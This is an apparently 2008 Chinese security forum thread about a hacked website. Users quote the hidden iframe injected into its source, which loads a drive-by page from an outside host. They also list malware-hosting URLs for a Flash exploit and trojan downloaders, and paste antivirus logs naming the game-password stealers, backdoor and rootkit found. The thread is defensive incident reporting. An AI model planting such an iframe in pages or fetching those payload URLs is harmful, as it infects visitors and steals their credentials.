IE进去就卡死...

loveyuwei

http://218.197.80.7/index.asp

RT，源文件里面加入了这个。

<!-- 加载函数文件 -->
  <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<iFrame src="http://yiduanEr.cn/pagE/rnb.htm?mor" wiDth=100 name='7780' hEight=0></iframE>
<!-- 加载函数文件完毕 -->

红伞应该会狂报的，但是我的KIS2009没反应。

ssy275

FIREFOX进去无反应

电影结束了

http://jasonhuk.62mf.cn/ma/1.swf
SWF:CVE-2007-0071 [Expl]
Exploit
080625-0, 2008-06-25

[ 本帖最后由 电影结束了 于 2008-6-25 13:18 编辑 ]

shery0000

电影结束了

F:\DOWNLOADER.rar>>DOWNLOADER\Baidu.exe                Trojan.Cap85254.jtuo                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\bak.css                  TrojanDownloader.Nurech.bd.bmqk       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys1.exe                 W32.Small.NDW.akkb                    病毒
F:\DOWNLOADER.rar>>DOWNLOADER\sys10.exe                TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys11.exe                TrojanSpy.Gen.oili                    木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys12.exe                TrojanPSW.OnLineGames.urs.adgq        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys13.exe                TrojanPSW.OnLineGames.urs.xjnk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys14.exe                Trojan.Cap862122.tlas                 木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys15.exe                TrojanPSW.OnLineGames.aphm.xnnu       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys16.exe                TrojanPSW.OnLineGames.aphm.ofoe       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys17.exe                Trojan.Cap86250.lpfs                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys18.exe                Trojan.Cap86144.hbow                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys19.exe                TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys2.exe                 TrojanDownloader.Nurech.bd.bmqk       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys20.exe                TrojanPSW.OnLineGames.urs.jlpi        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys21.exe                TrojanPSW.GameOL.odt.vhxn             木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys22.exe                Trojan.Cap86250.zaex                  木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys23.exe                TrojanPSW.OnLineGames.urs.wkrk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys24.exe                TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys25.exe                W32.Small.NDW.akkb                    病毒
F:\DOWNLOADER.rar>>DOWNLOADER\sys3.exe                 TrojanPSW.OnLineGames.wlu.kjdk        木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys4.exe                 TrojanPSW.OnLineGames.apms.dsel       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys5.exe                 Trojan.Cap861416.cnsi                 木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys6.exe                 TrojanPSW.OnLineGames.ascd.qtck       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys7.exe                 TrojanPSW.GameOL.odt.scch             木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys8.exe                 TrojanDownloader.Agent.udh.esdx       木马
F:\DOWNLOADER.rar>>DOWNLOADER\sys9.exe                 TrojanPSW.GameOL.odt.nimj             木马

冷冷

---》hXXp://user1.12-27.net/bak.css
---》hXXp://jasonhuk.62mf.cn/ma/1.exe

mofunzone

清空
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\swf(2)'
C:\Documents and Settings\morgan\My Documents\swf(2)\
  1.swf
      [DETECTION] Contains detection pattern of the exploits EXP/Flash.Gen
      [NOTE]      The file was deleted!
C:\Documents and Settings\morgan\My Documents\swf(2)\DOWNLOADER\
  Baidu.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.qqb.1
      [NOTE]      The file was deleted!
  bak.css
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.rqj.1
      [NOTE]      The file was deleted!
  sys1.exe
      [DETECTION] Is the Trojan horse TR/Agent.nbj
      [NOTE]      The file was deleted!
  sys10.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys11.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys12.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys13.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys14.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys15.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys16.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys17.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys18.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys19.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys2.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
          [2] Archive type: RSRC
          --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys20.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys21.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys22.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys23.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys24.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys25.exe
      [DETECTION] Is the Trojan horse TR/Agent.NBJ.1
      [NOTE]      The file was deleted!
  sys3.exe
    [0] Archive type: Runtime Packed
    --> Object
      [NOTE]      The file was deleted!
  sys4.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys5.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys6.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys7.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
  sys8.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
          [2] Archive type: Runtime Packed
          --> Object
        --> Object
            [DETECTION] Is the Trojan horse TR/Dldr.Small.xpd
            [WARNING]   Infected files in archives cannot be repaired!
        --> Object
      [DETECTION] File has been compressed with an unusual runtime compression tool (PCK/UPACK). Please verify the origin of the file
      [NOTE]      The file was deleted!
  sys9.exe
    [0] Archive type: Runtime Packed
      --> Object
        [1] Archive type: RSRC
        --> Object
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      The file was deleted!
C:\Documents and Settings\morgan\My Documents\swf(2)\swf\
  1.exe
      [DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [NOTE]      The file was deleted!
  1.swf
      [DETECTION] Contains detection pattern of the exploits EXP/Flash.Gen
      [NOTE]      The file was deleted!


End of the scan: 2008年6月24日  23:53
Used time: 00:06 min

The scan has been done completely.

      3 Scanning directories
     30 Files were scanned
     31 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
     30 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     -1 Files not concerned
      0 Archives were scanned
      1 Warnings
     30 Notes

wangjay1980

TO KL

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.Win32.Undef.gzb   
病毒： RootKit.Win32.Undef.jc   
病毒： Trojan.PSW.Win32.ZhuXian.hx
病毒： Trojan.PSW.Win32.ZeroOnline.dv
病毒： Trojan.PSW.Win32.GameOL.odt
病毒： Trojan.Win32.KillAV.abc  
病毒： Trojan.DL.Win32.Mnless.ala
病毒： Trojan.PSW.Win32.GameOL.oci
病毒： Trojan.PSW.Win32.GameOL.ogc
病毒： Trojan.PSW.Win32.RocOnline.lf
病毒： Trojan.PSW.Win32.GameOL.ofr
病毒： Trojan.DL.Win32.Small.vtg
病毒： Trojan.DL.Win32.Mnless.afz

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.50.22

markrhy

红伞杀！！！